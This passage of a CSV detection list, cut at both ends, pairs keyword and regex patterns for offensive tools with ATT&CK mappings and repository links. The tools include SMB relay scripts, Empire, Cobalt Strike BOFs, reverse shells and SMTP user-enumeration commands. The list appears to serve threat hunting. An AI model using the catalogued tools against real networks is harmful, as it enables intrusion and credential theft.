and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "*smbmapDump*",".{0,1000}smbmapDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*smbmap-execute-command.txt*",".{0,1000}smbmap\-execute\-command\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*smbmap-list-contents.txt*",".{0,1000}smbmap\-list\-contents\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*smbmap-master*",".{0,1000}smbmap\-master.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. 
This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "*smbmap-share-permissions.txt*",".{0,1000}smbmap\-share\-permissions\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*SMBNTLMChallenge*",".{0,1000}SMBNTLMChallenge.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SMBNTLMChallenge*",".{0,1000}SMBNTLMChallenge.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SMBNTLMResponse*",".{0,1000}SMBNTLMResponse.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*smbpasswd.py -newpass *",".{0,1000}smbpasswd\.py\s\-newpass\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*smbpasswd.py*",".{0,1000}smbpasswd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*SMBRelay.py*",".{0,1000}SMBRelay\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*SMBRelayChallenge*",".{0,1000}SMBRelayChallenge.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*smbrelayclient.py*",".{0,1000}smbrelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*smbrelayclient.py*",".{0,1000}smbrelayclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*smbrelayclient.py*",".{0,1000}smbrelayclient\.py.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","1","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*SMBRelayResponse*",".{0,1000}SMBRelayResponse.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*smbrelayserver.*",".{0,1000}smbrelayserver\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 
- T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*smbrelayserver.py*",".{0,1000}smbrelayserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*smbrelayx.py*",".{0,1000}smbrelayx\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*smb-reverse-shell.git*",".{0,1000}smb\-reverse\-shell\.git.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","13","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z" "*smb-reverse-shell-main*",".{0,1000}smb\-reverse\-shell\-main.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","13","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z" "*smbscan*",".{0,1000}smbscan.{0,1000}","offensive_tool_keyword","smb-scanner","SMB Scanner tool","T1210.001 - T1190 - T1020 - T1213","TA0007 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/TechnicalMujeeb/smb-scanner","1","1","N/A","N/A","1","54","15","2018-03-30T10:25:18Z","2018-03-29T14:13:20Z" "*smb-scanner*",".{0,1000}smb\-scanner.{0,1000}","offensive_tool_keyword","smb-scanner","SMB Scanner tool","T1210.001 - T1190 - T1020 - T1213","TA0007 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/TechnicalMujeeb/smb-scanner","1","1","N/A","N/A","1","54","15","2018-03-30T10:25:18Z","2018-03-29T14:13:20Z" 
"*SmbScanner.exe*",".{0,1000}SmbScanner\.exe.{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*smb-secrets-revealer.py*",".{0,1000}smb\-secrets\-revealer\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*smbserver.py -payload*",".{0,1000}smbserver\.py\s\-payload.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*smbserver.py -smb2support EXEGOL*",".{0,1000}smbserver\.py\s\-smb2support\sEXEGOL.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" 
"*smbserver.py*",".{0,1000}smbserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*smbsigning_check*",".{0,1000}smbsigning_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*smbspider *",".{0,1000}smbspider\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*smbspider.py*",".{0,1000}smbspider\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*smbsr.py*",".{0,1000}smbsr\.py.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*smbsrfile_results.csv*",".{0,1000}smbsrfile_results\.csv.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - 
TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*smicallef/spiderfoot*",".{0,1000}smicallef\/spiderfoot.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*SMShell.sln*",".{0,1000}SMShell\.sln.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","10","10","344","37","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" "*smtprelayclient.py*",".{0,1000}smtprelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*smtprelayclient.py*",".{0,1000}smtprelayclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*smtp-user-enum * -M EXPN *",".{0,1000}smtp\-user\-enum\s.{0,1000}\s\-M\sEXPN\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*smtp-user-enum * -M RCPT *",".{0,1000}smtp\-user\-enum\s.{0,1000}\s\-M\sRCPT\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*smtp-user-enum * -M VRFY 
